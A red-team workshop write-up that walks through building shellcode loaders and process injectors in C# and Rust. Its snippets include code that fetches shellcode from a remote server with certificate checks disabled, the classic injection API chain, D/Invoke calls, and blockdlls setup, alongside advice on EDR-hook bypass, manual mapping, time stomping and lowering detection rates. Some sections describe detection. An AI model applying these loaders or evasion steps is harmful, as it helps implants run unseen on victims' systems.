Exploring Dynamic Invocation for Process Injection in C# and Rust

Post Created: 15 May, 2023

Background

A while ago, I (w/ @pikaroot) conducted a Red Teaming/Malware Development workshop titled "Red Team Ops: Havoc 101" before graduating from university. As a fan of The Last of Us, I developed a series of themed process injectors/shellcode loaders, each named after a different Infected variant from the series, to work with the Havoc Framework. This blogpost covers the thought process behind developing them and the techniques implemented to evade detection.

This walkthrough is meant for beginners in Malware Development. If you're a seasoned MalDev, I suggest turning back for the sake of your time.

Disclaimer

While preparing for this workshop, I was in the middle of studying the Red Team Ops II (Certified Red Team Lead) course by Zero-Point Security. Therefore, a lot of the development ideas are borrowed from and inspired by the course itself.

Special thanks to:

Introduction

Just like the Cordyceps from The Last of Us, all five Process Injectors are introduced progressively, each adding functionality and improvements to the previous one. Note that the goal of this project IS NOT to create FUD malware with advanced evasion techniques such as AES Encryption, Polymorphism or Sandbox Evasion. It is instead focused on removing OPSEC indicators that may be flagged or raise suspicion.

Runner: The Baseline

Starting from scratch, I used a list of questions as a baseline to build up the specifications for Runner:

  • Programming Language - Access to Windows API?

  • Shellcode Delivery - Hardcoded or Fetch Remotely?

  • Victim Process - Current or Remote Process?

  • Injection Technique - Classic Injection or Advanced? (e.g. EarlyBird, Hell's Gate)

Programming Language

For the choice of programming language, I decided to go with C# because of my incompetency in C++ 🤡. Since C# is managed code, we need to leverage Platform Invoke (P/Invoke), provided by the System.Runtime.InteropServices namespace, to call the Windows API. If you are new to this concept, check out this blog by Matt Hand @ SpecterOps.

The usual way of using P/Invoke in C#:

[DllImport("kernel32.dll", EntryPoint = "OpenProcess", SetLastError = true)]
public static extern IntPtr fnOpenProcess(
        ProcessAccessFlags dwDesiredAccess,
        bool bInheritHandle,
        UInt32 dwProcessId);

This, however, comes with its own OPSEC implications, because any reference to a Windows API call made through P/Invoke will result in a corresponding static import entry in the .NET Assembly, referred to here as its Import Address Table (IAT).

This static reference is of course an added advantage if you're using Windows API for legitimate purposes because the application does not need to actively locate the function before calling it, thereby saving time and resources.

As a Malware Developer, this can be used against us, since Malware Analysts and automated security tools commonly inspect the imports of an executable statically, and may hook the IAT at runtime, to learn about its behavior.

To circumvent this, the implementation is improved later on in Stalker using Dynamic Invocation.
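To make the analyst's side of this concrete, here is a minimal sketch of the kind of import triage described above. It is written in Rust (the language RatKing is ported to later) and assumes the import names have already been extracted from the binary by some other tool. The `WATCHLIST` constant and the `flag_imports` helper are hypothetical names made up for illustration, not part of any real tool.

```rust
/// Hypothetical watchlist: the Win32 APIs used by the classic
/// injection chain discussed in this post.
const WATCHLIST: [&str; 5] = [
    "OpenProcess",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "VirtualProtectEx",
    "CreateRemoteThread",
];

/// Returns the imports that appear on the watchlist, preserving input order.
/// The comparison ignores ASCII case.
fn flag_imports<'a>(imports: &[&'a str]) -> Vec<&'a str> {
    imports
        .iter()
        .copied()
        .filter(|name| WATCHLIST.iter().any(|w| w.eq_ignore_ascii_case(name)))
        .collect()
}

fn main() {
    // Assumed input: import names already dumped from a sample.
    let imports = ["GetTickCount", "VirtualAllocEx", "CreateRemoteThread"];
    for hit in flag_imports(&imports) {
        println!("suspicious import: {hit}");
    }
}
```

A real scanner would weigh combinations of imports rather than single names, but even this naive check shows why a static reference to these four or five APIs stands out.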

Shellcode Delivery

Traditionally, Malware Developers hardcode AES/XOR or even RC4 encrypted shellcode within the executable to evade detection, like the following:

// Raw Shellcode
unsigned char shellcode[] = { 0x48, 0x65, 0x6c, 0x6c, 0x6f };

// Encrypted RC4
unsigned char shellcode[] = { 0x41, 0xd6, 0xaa, 0x12, 0x8e };

However, encrypted data looks close to random, so embedding it raises the entropy of the executable, which increases the odds of detection if the entropy value is over a threshold.

Encryption = Higher Entropy = More Randomness = Lower Compression
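The relationship above can be measured with Shannon entropy, expressed in bits per byte (0 for a single repeated value, 8 for perfectly uniform bytes). The following is a minimal sketch in Rust. The function name `shannon_entropy` and the sample inputs are my own for illustration, and real scanners may compute entropy per section or with their own thresholds.

```rust
/// Shannon entropy of a byte slice, in bits per byte (0.0 to 8.0).
fn shannon_entropy(data: &[u8]) -> f64 {
    if data.is_empty() {
        return 0.0;
    }

    // Count how often each byte value occurs.
    let mut counts = [0usize; 256];
    for &b in data {
        counts[b as usize] += 1;
    }

    // Sum -p * log2(p) over every byte value that actually occurs.
    let len = data.len() as f64;
    counts
        .iter()
        .filter(|&&c| c > 0)
        .map(|&c| {
            let p = c as f64 / len;
            -p * p.log2()
        })
        .sum()
}

fn main() {
    let repetitive = b"Hello, Hello, Hello, Hello!";
    // Every byte value exactly once: a stand-in for well-encrypted data.
    let uniform: Vec<u8> = (0..=255u8).collect();

    println!("repetitive: {:.2} bits/byte", shannon_entropy(repetitive));
    println!("uniform:    {:.2} bits/byte", shannon_entropy(&uniform));
}
```

The repetitive buffer scores far lower than the uniform one, which is the gap an entropy-based heuristic keys on.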

To avoid all the fuss with entropy detection, we're going to stage our shellcode on a remote server, then fetch it at runtime.

byte[] shellcode = { };

using (var handler = new HttpClientHandler())
{
    handler.ServerCertificateCustomValidationCallback = (message, cert, chain, sslPolicyErrors) => true;

    using (var client = new HttpClient(handler))
    {
        try
        {
            shellcode = await client.GetByteArrayAsync(urlPath);
        }
        catch
        {
            Process.GetCurrentProcess().Kill();
        }
    }
}

Depending on your scenario, you might want to avoid fetching shellcode remotely because the HTTPS connection may serve as an Indicator of Compromise (IoC). It is also not feasible if the target network has no outbound Internet connection.

Victim Process

Local vs Remote

Personally speaking, there is no definitive answer as to which is better between Local and Remote Process Injection. I believe what is being presented here is a give-and-take scenario, as each of the methods comes with its own OPSEC considerations.

Oftentimes, it can be difficult to avoid certain bad practices, so the ideal way in my opinion is to go with the one with minimal or tolerable OPSEC indicators. To accommodate such requirements, all Process Injectors in this blogpost will have the option to either inject locally or remotely.

Local Process Injection

Pros:

  • Occurs entirely in the current process, and therefore does not require handles to remote processes.

Cons:

  • Requires extra effort to blend in.

  • Loader must stay alive for back-and-forth C2 connection.

Remote Process Injection

Pros:

  • Loader injects C2 implant shellcode to remote process and exits immediately.

  • Extra flexibility when it comes to victim process selection. Freedom to inject into legitimate processes like Teams, Discord & Slack to blend into traffic.

  • Compatible with behavioral evasion techniques like PPID Spoofing.

Cons:

  • Suspicious memory allocation to remote processes.

  • Requires handles to remote processes.

Injection Technique

There are a ton of fancy injection techniques out there such as Asynchronous Procedure Call (APC), Process Hollowing, Process Herpaderping and many more, but for the sake of simplicity, we will use the most classic method. This technique is fairly straightforward and self-explanatory based on the API names themselves, so I won't be discussing it in detail.

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(
    IntPtr hProcess,
    IntPtr lpAddress,
    uint dwSize,
    AllocationType flAllocationType,
    MemoryProtection flProtect);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(
    IntPtr hProcess,
    IntPtr lpBaseAddress,
    byte[] lpBuffer,
    int nSize,
    out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(
    IntPtr hProcess,
    IntPtr lpAddress,
    uint dwSize,
    MemoryProtection flNewProtect,
    out MemoryProtection lpflOldProtect);
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr CreateRemoteThread(
    IntPtr hProcess,
    IntPtr lpThreadAttributes,
    uint dwStackSize,
    IntPtr lpStartAddress,
    IntPtr lpParameter,
    uint dwCreationFlags,
    out IntPtr lpThreadId);

For more advanced process injection techniques, check out Red Team Notes.

Tool Processing

Before delivering the tool, we can also strip off any additional static indicators like debugging symbols to prevent tracing back to us.

Debug Symbols

A commonly overlooked mistake is leaving your home directory embedded in the executable. This is terrible OPSEC because there is a chance that your custom tooling may be instantly flagged if it matches any past occurrences from VirusTotal (assuming you are a well-known & tracked actor) despite having cutting-edge evasion tactics implemented.

It is actually not that hard to strip debugging symbols. Simply compile your program in Release mode.

You can also clone metadata from a legitimate application, and apply time stomping so that the file blends in with your pretext.

Detection

As mentioned earlier, IAT hooking can be implemented to detect Runner. However, the simplest approach in this case would be to monitor the usage of Win32 API using API Monitor by rohitab.

Stalker: The Unseen

As the successor to the previous stage, Stalker improves on Runner in two ways: Dynamic Invocation and Native APIs.

Dynamic Invocation

Rather than statically importing API calls with P/Invoke, Dynamic Invocation (D/Invoke) can be used to load Windows DLLs, e.g. kernel32.dll & ntdll.dll, at runtime and call their exported functions, thereby bypassing API hooking, specifically IAT hooking. Read more about D/Invoke here.

The usual way of using D/Invoke in C#:

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate NTSTATUS NtAllocateVirtualMemory(
    IntPtr processHandle,
    ref IntPtr baseAddress,
    IntPtr zeroBits,
    ref IntPtr regionSize,
    AllocationType flAllocationType,
    MemoryProtection flProtect);
    
var fPtr = Generic.GetLibraryAddress("ntdll.dll", "NtAllocateVirtualMemory");
NtAllocateVirtualMemory fnNtAllocateVirtualMemory = Marshal.GetDelegateForFunctionPointer(fPtr, typeof(NtAllocateVirtualMemory)) as NtAllocateVirtualMemory;
var status = (NTSTATUS)fnNtAllocateVirtualMemory(
    target.Handle,
    ref baseAddress,
    IntPtr.Zero,
    ref regionSize,
    AllocationType.Commit | AllocationType.Reserve,
    MemoryProtection.ExecuteReadWrite);

As red team tradecraft has advanced over the years, D/Invoke has become a well-known technique, and the original version of D/Invoke by TheWover is now heavily signatured.

Ideally, we want to use a custom version of D/Invoke for a cleaner detection result, but for the sake of simplicity, we can opt for a minified version of D/Invoke by RastaMouse. Simply import all the source files into the project or add DInvoke.dll as a reference to the project.

Upon compilation, Visual Studio will spit out both .exe and .dll files. This is obviously non-ideal if we want to deliver a single executable file to our victim.

This also means that the executable will not function properly if the .dll file it depends on is missing from the same directory.

To solve this issue, install a dependency merger like dnMerge or Fody to merge the two files into a single executable.

Native API

From a user-land perspective, there is no real benefit to calling kernel32-level APIs when the Native API is still within our reach. At the end of the day, a Win32 API like VirtualAllocEx will end up calling NtAllocateVirtualMemory, which is its equivalent at the native level.

Win32 API Process Injection
VirtualAllocEx() ---> WriteProcessMemory() ---> VirtualProtectEx() ---> CreateRemoteThread()

Assuming that you are facing an (outdated) EDR that still applies hooks at the Win32 level, leveraging the Native API is the simplest way to bypass the hooks without any fancy evasion tactics.

Native API Process Injection
NtAllocateVirtualMemory() ---> NtWriteVirtualMemory() ---> NtProtectVirtualMemory() ---> NtCreateThreadEx()

Most Native APIs are undocumented on MSDN. You can instead rely on DInvoke.net, Undocumented NTInternals or ReactOS Source to obtain the API signatures.

Detection

On top of IAT Hooking, EDRs also frequently implement Inline Hooking. The major difference between the two is where the hook lives: IAT Hooking overwrites entries in the Import Address Table, while Inline Hooking patches the function code itself inside the DLL modules that are loaded during process startup.

Before Inline Hooking is implemented, the assembly code for all Native APIs follows a similar structure known as a Syscall Stub, with the following instructions:

mov r10, rcx
mov eax, 0C7H <--- SSN
syscall
ret

The only difference that you may notice is the value of the System Service Number (SSN), which identifies the Native API being invoked.
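When looking at stubs in a debugger or disassembler, it helps to recognise this layout at the byte level: `mov r10, rcx` encodes as `4C 8B D1` and `mov eax, imm32` as `B8` followed by the four-byte little-endian SSN. The Rust sketch below classifies a byte slice that has already been copied out by some other tool. It only parses bytes and does not read process memory. The `Stub` enum and `classify_stub` function are hypothetical names, and treating a leading `E9` (near `jmp`) as a redirect is a simplifying assumption, since real hooks come in several shapes.

```rust
/// Result of looking at the first bytes of a Native API stub.
#[derive(Debug, PartialEq)]
enum Stub {
    /// Starts with `mov r10, rcx; mov eax, <ssn>`.
    Intact { ssn: u32 },
    /// Starts with (or jumps right after `mov r10, rcx` via) a near `jmp`.
    Redirected,
    /// Anything else: this sketch does not try to interpret it.
    Unknown,
}

fn classify_stub(bytes: &[u8]) -> Stub {
    match bytes {
        // 4C 8B D1 = mov r10, rcx ; B8 imm32 = mov eax, imm32 (little-endian)
        [0x4C, 0x8B, 0xD1, 0xB8, a, b, c, d, ..] => Stub::Intact {
            ssn: u32::from_le_bytes([*a, *b, *c, *d]),
        },
        // E9 rel32 = near jmp, either first or straight after mov r10, rcx
        [0xE9, ..] | [0x4C, 0x8B, 0xD1, 0xE9, ..] => Stub::Redirected,
        _ => Stub::Unknown,
    }
}

fn main() {
    // The example stub from above: SSN 0xC7, then syscall (0F 05) and ret (C3).
    let clean = [0x4C, 0x8B, 0xD1, 0xB8, 0xC7, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3];
    // Illustrative patched stub: the first instruction replaced by a jmp.
    let patched = [0xE9, 0x10, 0x20, 0x30, 0x40, 0x00, 0x00, 0x00];

    println!("{:?}", classify_stub(&clean));
    println!("{:?}", classify_stub(&patched));
}
```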

To emulate the detection of Stalker, we will use SylantStrike to place EDR hooks via Inline Hooking. Ideally, a robust EDR will have much more complex nested conditions in place to examine the legitimacy of an API call and to avoid false positives. However, for the sake of simplicity, we will have SylantStrike alert us with a MessageBox whenever a suspicious thread is created.

DWORD NTAPI NtCreateThreadEx(OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN PVOID ObjectAttributes, IN HANDLE ProcessHandle, IN PVOID lpStartAddress, IN PVOID lpParameter, IN ULONG Flags, IN SIZE_T StackZeroBits, IN SIZE_T SizeOfStackCommit, IN SIZE_T SizeOfStackReserve, OUT PVOID lpBytesBuffer) {
	if (lpStartAddress == (LPTHREAD_START_ROUTINE)suspiciousBaseAddress) {

		MessageBox(nullptr, TEXT("Malicious NtCreateThreadEx usage detected! Aborting!"), TEXT("SylantStrike"), MB_OK);
		TerminateProcess(GetCurrentProcess(), 0xdead1337);
		return 0;
	}

	// False positive, call the original function as normal
	return pOriginalNtCreateThreadEx(hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, Flags, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
}

I like to call EDRs trusted malware because they basically leverage the same set of techniques that Malware Developers use to inject DLLs into our processes. The injected DLL tampers with the original structure of the Syscall Stub and diverts the application flow to an address space controlled by the EDR using a simple jmp instruction.

To verify whether a process is injected by EDR, simply navigate to the Modules tab in Process Hacker to enumerate the presence of EDR DLLs.

Another thing worth noting is that a real EDR might also take iterative steps to monitor for malicious behaviours prior to injection. In simpler words, it will not take any proactive action when abnormal memory allocation or protection modification occurs; instead, it will continue to monitor for more events before eventually terminating the process.

Clicker: The Convoy

There are several aggressive ways to neutralize (unhook) EDR hooks, which involve patching the Native API Syscall Stub to restore its original instructions. This, however, is risky if done without caution, especially against EDRs that perform integrity checks on their hooks.

Process Mitigation Policy (BlockDLLs)

With all these obstacles presented, what is a better way of unhooking than aggressive patching? Stopping the EDR from injecting in the first place, using Process Mitigation Policy. Processes with this policy enabled will DENY EDRs from injecting their DLLs unless the DLLs are signed and trusted by Microsoft.

At this point, you might realize that Clicker is actually not a process injector, but rather a carrier that will spawn Stalker with Process Mitigation Policy enabled, hence the name Convoy.

The Windows API gives us more granular control over the processes that we create. This is merely one of the many options that we can play with to evade detection. Other interesting creation flags include CREATE_SUSPENDED, CREATE_NO_WINDOW and many more that will allow you to hide in plain sight.

In this case, we will use UpdateProcThreadAttribute specifically to apply the PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY attribute to enforce blockdlls.

const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007;
const long PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000;

IntPtr lpMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteInt64(lpMitigationPolicy, PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON);

fPtr = Generic.GetLibraryAddress("kernel32.dll", "UpdateProcThreadAttribute");
Win32.UpdateProcThreadAttribute fnUpdateProcThreadAttribute = Marshal.GetDelegateForFunctionPointer(fPtr, typeof(Win32.UpdateProcThreadAttribute)) as Win32.UpdateProcThreadAttribute;
var success = fnUpdateProcThreadAttribute(
    si.lpAttributeList,
    0,
    (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY,
    lpMitigationPolicy,
    (IntPtr)IntPtr.Size,
    IntPtr.Zero,
    IntPtr.Zero);

Pitfalls

As this technique became better known and more popular, Microsoft ended blockdlls once and for all by handing out intermediate certificates to EDR vendors, allowing them to sign their DLLs so that they can be injected into processes that have Process Mitigation Policy enabled.

As far as I am aware, an EDR will typically inject more than one DLL for more robust detection. The problem is, not all DLLs of a vendor will be Microsoft-signed. While this may not allow you to circumvent the EDR entirely, you might still find opportunities to impair certain functionalities of the EDR due to this defect.

Bloater: The Sovereign

To achieve a clean EDR bypass, Bloater implements Manual Mapping from D/Invoke to bypass Inline Hooking. This is a relatively safe way of circumventing EDR because the integrity of EDR hooks is not tampered with.

Manual Mapping

Whenever a user-land process is initialized, an EDR will install hooks on the DLL modules e.g. kernel32.dll and ntdll.dll that live inside the process memory. All of this takes place before control over the process is diverted back to the user.

Manual Mapping takes advantage of this time window to ensure that all DLLs loaded afterwards are free of EDR hooks. Instead of resolving API calls from modules that are hooked (red region), it will map a fresh copy of ntdll.dll from disk into the process memory at runtime. As a result, all API calls invoked from the "evil twin" of ntdll.dll (green region) will not be hooked, thereby bypassing EDR detection.

RatKing: The Overlord

If our process injector falls into the hands of a Security Analyst, it can be decompiled and reverse engineered pretty quickly using tools like ILSpy or dnSpy.

We can make their life (and ours) significantly harder by porting the code from C# to Rust, because writing and decompiling Rust is quite literally brainf$ck.

The result is a clean 0/26 detection on antiscan.me. I believe the reason is the way Rust statically links all external crates at compile time, which messes up all the detection signatures.

Analyzing the executable in VirusTotal also shows a very low detection rate of 1/70. I might be wrong, but I believe that the Command Line Parser also plays a big role here. If the proper arguments are not provided from the command line, the executable will not detonate. This is known as Environmental Keying or Execution Guardrails, which could very well be the reason why sandboxes are having a hard time analyzing the file.

While Rust provides a clean detection result (for now), it is not even close to being as flexible as C/ASM. Ultimately, we ended up adding several external libraries for support due to the difficult nature of Rust. This can be used as an indicator for detection in the long run.

2 Months Later

As the source code and compiled binaries of all Process Injectors were open-sourced on GitHub, Microsoft Defender quickly picked up on this and assigned 2 different Malware Detection Names. This is very common, as we all know by now that Microsoft acquired GitHub for the sole purpose of collecting security intelligence 👀.

References
